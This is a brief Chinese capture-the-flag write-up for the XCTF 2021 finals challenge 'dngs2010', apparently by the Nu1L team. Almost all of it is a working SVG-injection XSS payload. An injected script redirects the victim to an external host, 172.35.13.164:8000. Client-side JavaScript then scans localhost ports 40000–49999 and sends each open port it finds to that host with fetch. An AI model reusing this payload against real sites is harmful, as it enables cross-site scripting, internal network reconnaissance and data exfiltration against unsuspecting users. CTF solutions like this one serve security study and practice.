XCTF2021决赛wp

Author:Nu1L Team

dngs2010

svg注入 xss

ET /img/88888888"><%2fimage>
<script>window.location='http:%2f%2f172.35.13.164:8000%2ffuck2.html';<%2fscript>
<image%20fuck=".png
<body>
<script>
const scan = (ip, port) => {
 let s = document.createElement("script");
 s.src = "http://" + ip + ":" + port;
 s.onload = () => {
 if(port != 3000){

 fetch("<http://172.35.13.164:8000/?p=>" + port)
 for(let i = 0; i < 300000; i++) {
 console.log("fuck!!!!");
 }
 }
 };
 document.getElementsByTagName('body')[0].appendChild(s);
};
let p = Array.from({length: 10000}, (a, i) => i + 40000);
port = p;
let i = 0;
while(i != p.length){
 scan("127.0.0.1", port[i]);
 i = i + 1;
}
window.onload = () => {
 fetch("<http://172.35.13.164:8000/?windowonload>");
};
</script>
</body>
上一篇:消耗排名前50查询SQL


下一篇:3GPP协议学习-TS 38.211-NR;物理信道与调制